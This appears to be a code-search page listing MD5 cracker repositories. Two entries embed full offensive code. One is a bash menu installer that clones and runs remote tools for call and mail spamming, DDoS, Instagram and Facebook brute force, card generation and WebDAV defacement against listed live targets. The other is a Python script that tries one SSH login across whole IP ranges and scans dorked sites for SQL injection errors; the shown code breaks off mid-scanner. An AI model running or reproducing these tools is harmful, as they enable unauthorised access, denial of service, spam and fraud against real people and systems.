42 skills found · Page 1 of 2
juuso / BozoCrackA silly & effective MD5 cracker in Ruby
feross / Md5 Password Cracker.jsCrack MD5 passwords with JavaScript Web Workers
ikkebr / PyBozoCrackA silly & effective MD5 cracker in Python
John-Leitch / Fpga Md5 CrackerA 64-stage pipelined MD5 implementation written in verliog. Runs reliably on a DE0-Nano at 100mhz, computing 100 million hashes per second.
evilsocket / FangA multi service threaded MD5 cracker
xpn / CUDA MD5 CrackMD5 password cracker for CUDA
aaronjwood / CrackerParallel password cracker. Supports NTLM, LM, MD5, MD4, SHA1, SHA224, SHA256, SHA384, and SHA512.
DrPython3 / MD5BruterBruteforce tool / cracker for MD5 hashes. Processing single hashes, lists and combolists (userid:md5hash).
iryont / Md5 CrackerSimple MD5 cracker (CUDA)
MrAstra96 / Mytools#TOOL INSTALLER V.1.0 #CODED BY : Mr.Astra96 #CODENAME : DheMell bi='\033[34;1m' #biru ij='\033[32;1m' #ijo pr='\033[35;1m' #purple cy='\033[36;1m' #cyan me='\033[31;1m' #merah pu='\033[37;1m' #putih ku='\033[33;1m' #kuning or='\033[1;38;5;208m' #Orange echo "-----------------------------------------------------------" toilet -f pagga " Kalsel{Z}Tool"|lolcat echo "-----------------------------------------------------------" echo $ij"[+]─────────────────────────────────────────────────────[+]" echo $ij" | •••••••••• |Kalsel[E]Xploit| •••••••••••• |" echo $ij" | ───────────────────────────────────────────────────── |" echo $ij" | VERSION TOOL: INSTALLER V.1.0 |" echo $ij" | Author : Mr.Astra |" echo $ij" | CodeName : IY×TraCode |" echo $ij" | Instagram : mr_astra96 |" echo $ij" | Telegram : htttps://t.me/RabbitCL4Y |" echo $ij" | Github : https://github.com/RabbitCL4Y |" echo $ij" | Thanks To : •Santri Pasuruan• |" echo $ij" | COPYRIGHT : 2K19 Kalsel[E]Xploit |" echo $ij"[+]─────────────────────────────────────────────────────[+]" echo echo $pu"───────────────────────────────────────────" echo $or"[00]" $pu"About" $ku"Tool" $ij"Program" echo $pu"───────────────────────────────────────────" echo $pu"───────────────────────────────────────────" echo $me" Kalsel[E]Xploit×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[01]" $ku"SPAM-CALL |" echo $cy"[02]" $pu"Yt-Downloader |" echo $cy"[03]" $me"DORK-SCANNER |" echo $cy"[04]" $pr"REV-IP |" echo $cy"[05]" $ij"CHECK-IP |" echo $cy"[06]" $bi"INSTAHACK |" echo $cy"[07]" $or"AdminFinder |" echo $cy"[08]" $ku"DDoS |" echo $cy"[09]" $pu"MD5-CRACKER |" echo $cy"[10]" $me"CAPING-BOT |" echo $cy"[11]" $pr"MAIL-SPAMMER |" echo $cy"[12]" $ij"Im3-Spammer |" echo $cy"[13]" $bi"Create-Bot-SSH |" echo $cy"[14]" $or"ghoul |" echo $cy"[15]" $ku"SQLI-Vuln-Checker |" echo $cy"[16]" $pu"Wp-Scan |" echo $cy"[17]" $me"NAS |" echo $cy"[18]" $pr"Mp4-Convert |" echo $cy"[19]" $ij"Exploit-LokoMedia |" echo $cy"[20]" $bi"DDoS-With-Perl |" echo $cy"[21]" $or"ApkPure-Downloader |" echo $cy"[22]" $ku"GitHub-Info |" echo $cy"[23]" $pu"Proxy-Checker |" echo $cy"[24]" $me"PenKEX [Penetration Testing] |" echo $cy"[25]" $pr"Ysub-Checker |" echo $cy"[26]" $ij"Text-To-Hex |" echo $cy"[27]" $bi"Apk-Webdav (By :Kalsel[E]Xploit) |" echo $cy"[28]" $or"Pentester |" echo $cy"[29]" $ku"ASWPLOIT |" echo $cy"[30]" $pu"InFoGa {Information-Gathering} |" echo $pu"───────────────────────────────────────────" echo $me" ZseCc0de-Crew.ID×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[31]" $ku"ParrotSec |" echo $cy"[32]" $pu"GrabGithub |" echo $cy"[33]" $me"SubFinder |" echo $cy"[34]" $pr"RoliSpam |" echo $cy"[35]" $ij"Mail-Filter |" echo $cy"[36]" $bi"AdminScan |" echo $cy"[37]" $or"IPinfo |" echo $cy"[38]" $ku"CardGen |" echo $cy"[39]" $pu"CardValidator |" echo $cy"[40]" $me"BlogGrab |" echo $cy"[41]" $pr"IgStalker |" echo $cy"[42]" $ij"GpsTrack |" echo $cy"[43]" $bi"UrlDecode |" echo $cy"[44]" $or"Checker |" echo $cy"[45]" $ku"FbBot |" echo $cy"[46]" $pu"YtSub |" echo $pu"───────────────────────────────────────────" echo $me" I.T.A×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[47]" $ku"TOOLINSTALLERv1 |" echo $cy"[48]" $pu"TOOLINSTALLERv2 |" echo $cy"[49]" $me"TOOLINSTALLERv3 |" echo $cy"[50]" $pr"TOOLINSTALLERv4 |" echo $cy"[51]" $ij"DIR |" echo $cy"[52]" $bi"REVERSEIP |" echo $cy"[53]" $or"TRACKIP |" echo $cy"[54]" $ku"DNSLOOKUP |" echo $cy"[55]" $pu"WHOIS |" echo $cy"[56]" $me"REVESEDNS |" echo $cy"[57]" $pr"WEBDAV |" echo $cy"[58]" $ij"DIRHUNT |" echo $cy"[59]" $bi"SUBDO |" echo $cy"[60]" $or"HTTPHEADERS |" echo $cy"[61]" $ku"YOUTUBE-DOWNLOADER |" echo $cy"[62]" $pu"ADLOG (ADMIN LOGIN) |" echo $cy"[63]" $me"JADWAL-SHOLAT |" echo $cy"[64]" $pr"TOOLKIT |" echo $cy"[65]" $ij"BASH-ENCRYPT |" echo $cy"[66]" $bi"ENCRYPT-PYTHON |" echo $cy"[67]" $or"Facebook-BruteForce |" echo $cy"[68]" $ku"VULNSCANNING |" echo $cy"[69]" $pu"SHORTENERLINKS |" echo $cy"[70]" $me"PERKIRAANCUACA |" echo $cy"[71]" $pr"ARITMATIKA |" echo $pu"───────────────────────────────────────────" echo $me" Black Coder Crush×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[72]" $ku"Shortlink |" echo $cy"[73]" $pu"404GitHub |" echo $cy"[74]" $me"X-Caping |" echo $cy"[75]" $pr"ScriptCreator |" echo $cy"[76]" $ij"LinkChatGen |" echo $cy"[77]" $bi"BulkMailSpam |" echo $cy"[78]" $or"BinCon |" echo $cy"[79]" $ku"DfvAscii |" echo $cy"[80]" $pu"DfvXploit |" echo $pu"───────────────────────────────────────────" echo $me" BlackWare Coders Team×Tool" echo $pu"───────────────────────────────────────────" echo $cy"[81]" $ku"Dorking |" echo $cy"[82]" $pu"Scanning |" echo $cy"[83]" $me"Reverse-Ip |" echo $cy"[84]" $pr"CBT-Vuln-Scanner |" echo $pu"───────────────────────────────────────────" echo $me" INSTALL BAHANNYA DULU GAN" echo $pu"───────────────────────────────────────────" echo $cy"[99]" $or"PILIH AKU SENPAI😍😍" echo $pu"───────────────────────────────────────────" echo $me"┌==="$bi"["$i"Mr.Astra code"$bi"]"$me"======"$bi"["$i""SELECT THE NUMBER""$bi"]" echo $me"¦" read -p"└──# " kaex if [ $kaex = 1 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/SPAM-CALL cd SPAM-CALL bash CaLL.sh fi if [ $kaex = 2 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/YOUTUBE-DOWNLOADER cd YOUTUBE-DOWNLOADER python2 youtube.py fi if [ $kaex = 3 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DORK-SCANNER cd DORK-SCANNER php scan.php fi if [ $kaex = 4 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/REV-IP cd REV-IP python3 rev.io fi if [ $kaex = 5 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CHECK-IP cd CHECK-IP python2 checkip.py fi if [ $kaex = 6 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/INSTAHACK cd INSTAHACK python2 insta.py fi if [ $kaex = 7 ] then clear figlet -f slant "[PLEASE WAIT"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/AdminFinder cd AdminFinder python2 admin.py fi if [ $kaex = 8 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DDoS cd DDoS python2 ddos.py fi if [ $kaex = 9 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/MD5-CRACKER cd MD5-CRACKER python2 md5.py fi if [ $kaex = 10 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CAPING-BOT cd CAPING-BOT php bot.php fi if [ $kaex = 11 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/MAIL-SPAMMER cd MAIL-SPAMMER php mail.php fi if [ $kaex = 12 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Im3-Spammer cd Im3-Spammer php im3.php fi if [ $kaex = 13 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/CREATE-BOT-SSH cd CREATE-BOT-SSH python2 ssh.py fi if [ $kaex = 14 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/ghoul cd ghoul python3 ghoul.py fi if [ $kaex = 15 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/SQLI-Vuln-Checker cd SQLI-Vuln-Checker python3 sqli.py fi if [ $kaex = 16 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Wp-Scan cd Wp-Scan python2 auto.py fi if [ $kaex = 17 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/NAS cd NAS python3 sabyan.chan fi if [ $kaex = 18 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Mp4-Convert cd Mp4-Convert python2 tube.py fi if [ $kaex = 19 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Exploit-Lokomedia cd Exploit-Lokomedia python2 Loko.py fi if [ $kaex = 20 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/DDoS-With-Perl cd DDoS-With-Perl perl dos.pl fi if [ $kaex = 21 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Apkpure-Downloader cd Apkpure-Downloader pip2 install -r requirements.txt python2 apk.py fi if [ $kaex = 22 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/GitHub-Info cd GitHub-Info python3 github.py -h fi if [ $kaex = 23 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/PROXY-CHECKER cd PROXY-CHECKER python3 proxy.py fi if [ $kaex = 24 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/PenKEX cd PenKEX python2 PenKex.py fi if [ $kaex = 25 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Ysub-Checker cd Ysub-Checker php ysub.php fi if [ $kaex = 26 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Text-To-Hex cd Text-To-Hex python2 hextex.py fi if [ $kaex = 27 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Webdav-Apk mv -f Webdav-Apk /sdcard cd /sdcard/Webdav-Apk echo $cy"APLIKASI WEBDAV NYA ADA DI DIRECTORY SDCARD/INTERNAL KALIAN" sleep 9 ls fi if [ $kaex = 28 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/Pentester cd Pentester python2 pentest.py fi if [ $kaex = 29 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/ASWPLOIT cd ASWPLOIT sh install.sh fi if [ $kaex = 30 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/KALSELeXploit/InFoGa cd InFoGa python infoga.py fi if [ $kaex = 31 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/ParrotSec cd ParrotSec bash parrot.sh fi if [ $kaex = 32 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/grabgithub cd grabgithub bash github.sh fi if [ $kaex = 33 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/subfinder cd subfinder bash subdocheck.sh fi if [ $kaex = 34 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/rolispam cd rolispam bash rolispam.sh fi if [ $kaex = 35 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/mail-filter cd mail-filter bash filter.sh fi if [ $kaex = 36 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/adminscan cd adminscan bash admin.sh fi if [ $kaex = 37 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/Ipinfo cd Ipinfo bash ipinfo.sh fi if [ $kaex = 38 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/cardgen cd cardgen bash cc.sh fi if [ $kaex = 39 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/cardvalidator cd cardvalidator bash card.sh fi if [ $kaex = 40 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/bloggrab cd bloggrab bash bloggrab.sh fi if [ $kaex = 41 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/igstalker cd igstalker bash igstalker.sh fi if [ $kaex = 42 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/gpstrack cd gpstrack bash gpstrack.sh fi if [ $kaex = 43 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/urldecode cd urldecode bash urldecode.sh fi if [ $kaex = 44 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/checker cd checker bash yahoo.sh fi if [ $kaex = 45 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/fbbot cd fbbot bash bot.sh fi if [ $kaex = 46 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/zsecc0de-crew-id/ytsubs cd ytsubs bash ytsubs.sh fi if [ $kaex = 47 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv1 cd TOOLSINSTALLERv1 sh Tuanb4dut.sh fi if [ $kaex = 48 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv2 cd TOOLSINSTALLERv2 sh Tuanb4dut.sh fi if [ $kaex = 49 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv3 cd TOOLSINSTALLERv3 sh TUANB4DUT.sh fi if [ $kaex = 50 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLSINSTALLERv4 cd TOOLSINSTALLERv4 chmod +x TUANB4DUT..sh ./TUANB4DUT..sh fi if [ $kaex = 51 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DIR cd DIR sh dir.sh fi if [ $kaex = 52 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/REVERSEIP sh REVERSEIP.sh fi if [ $kaex = 53 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TRACKIP cd TRACKIP sh TRACKIP.sh fi if [ $kaex = 54 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DNSLOOKUP cd DNSLOOKUP sh DNSLOOKUP.sh fi if [ $kaex = 55 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/WHOIS cd WHOIS sh WHOIS.sh fi if [ $kaex = 56 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/REVERSEDNS cd REVERSEDNS sh REVERSEDNS.sh fi if [ $kaex = 57 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/WEBDAV cd WEBDAV echo $or"LIVE TARGET DEFACE POC WEBDAV" cat WebLiveTarget.txt sleep 7 sh webdav.sh fi if [ $kaex = 58 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/DIRHUNT cd DIRHUNT sh DIRHUNT.sh fi if [ $kaex = 59 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/SUBDO cd SUBDO sh subdo.sh fi if [ $kaex = 60 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/HTTPHEADERS cd HTTPHEADERS sh httpheaders.sh fi if [ $kaex = 61 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/YOUTUBE cd YOUTUBE sh install.sh chmod +x YOUTUBE.sh ./YOUTUBE.sh fi if [ $kaex = 62 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ADLOG cd ADLOG python2 adlog.py fi if [ $kaex = 63 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/JADWALSHOLAT cd JADWALSHOLAT sh jadwal.sh fi if [ $kaex = 64 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/TOOLKIT cd TOOLKIT sh TUANB4DUT.sh fi if [ $kaex = 65 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/BASH-ENCRYPT cd BASH-ENCRYPT sh setup.sh sh encrypt.sh fi if [ $kaex = 66 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ENCRYPT-PYTHON cd ENCRYPT-PYTHON python2 compile.py fi if [ $kaex = 67 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/FACEBOOK-BRUTEFORCE cd FACEBOOK-BRUTEFORCE python2 bruteforce.py fi if [ $kaex = 68 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/VULNSCANNING cd VULNSCANNING python2 testvuln.py fi if [ $kaex = 69 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/SHORTNERLINKS cd SHORTNERLINKS sh URL.sh fi if [ $kaex = 70 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/PERKIRAAN-CUACA cd PERKIRAAN-CUACA sh CUACA.sh fi if [ $kaex = 71 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/TUANB4DUT/ARITMATIKA cd ARITMATIKA sh aritmatika.sh fi if [ $kaex = 72 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/shortlink cd shortlink python2 shortlink.py fi if [ $kaex = 73 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/404Github cd 404Github python2 404Github.py fi if [ $kaex = 74 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/X-Caping cd X-Caping python2 Scaping.py fi if [ $kaex = 75 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/ScriptCreator cd ScriptCreator python2 Screator.py fi if [ $kaex = 76 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/LinkChatGen cd LinkChatGen sh chat.wa fi if [ $kaex = 77 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/BulkMailSpam cd BulkMailSpam python2 BulkMailSpam.py exit fi if [ $kaex = 78 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/BinCon cd BinCon pythob2 bin.con exit fi if [ $kaex = 79 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/DfvAscii cd DfvAscii sh dfv.ascii fi if [ $kaex = 80 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/blackcodercrush/DfvXploit cd DfvXploit pip install -r modul.txt python dfv.xploit fi if [ $kaex = 81 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/Dorking cd Dorking sh Dork.sh fi if [ $kaex = 82 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/scanning cd scanning sh vuln-scanner.sh fi if [ $kaex = 83 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/Reverse-Ip cd Reverse-Ip python2 github.py fi if [ $kaex = 84 ] then clear figlet -f slant "[PLEASE WAIT]"|lolcat sleep 1.8 git clone https://github.com/black-ware/CBT-Vuln_scanner cd CBT-Vuln_scanner python2 cbt-scanner.py fi if [ $kaex = 99 ] then clear pkg update && pkg upgrade pkg install git pkg install python2 && pkg install python pip2 install lolcat pip2 install requests pip2 install mechanize pip2 install dirhunt pip2 install youtube-dl pkg install curl pkg install php pip2 install termcolor pip2 install bs4 pip2 install beautifulsoup pip2 install colorama pkg install perl pkg install ruby pip install requests pkg install figlet fi if [ $kaex = 00 ] then clear echo $pu"───────────────────────────────────────────" echo $or"CEO" $ku"AND" $bi"FOUNDER" $ij"Kalsel" $pu"[" $pr"E" $pu"]" $cy"Xploit" echo $pu"───────────────────────────────────────────" echo $ij"CEO & FOUNDER" $or"Kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $cy"NAME : ARDHO AINULLAH" echo $or"CODENAME : MUH4K3M0S" echo $pu"SCHOOL : DARUSSALLAM" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────" echo $ij"LEADER" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $or"NAME : MUHAMMAD RAFLI" echo $ij"CODENAME : IY×RafCode" echo $cy"SCHOOL : NURUL HIDAYAH" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────" echo $ij"CO-LEADER" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $ku"NAME : M.WIDHI SATRIO" echo $ij"CODENAME : WIDHISEC" echo $pu"SCHOOL : ----" echo $cy"REGION : KALIMANTAN BARAT" echo $pu"───────────────────────────────────────────" echo $ij"ADMIN" $or"kalsel" $bi"[" $ij"E" $bi"]" $or"Xploit" echo $pr"NAME : --------" echo $or"CODENAME : MR_MSDV" echo $pu"SCHOOL : -------" echo $ku"REGION : KALIMANTAN SELATAN" echo $pu"───────────────────────────────────────────"
PushpenderIndia / Brute Md5Advanced, Light Weight & Extremely Fast MD5 Cracker/Decoder/Decryptor written in Python 3
udinparla / Aa.py#!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nDorking...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('oracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('system.data.oledb', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('SQL command net properly ended', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('atoracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 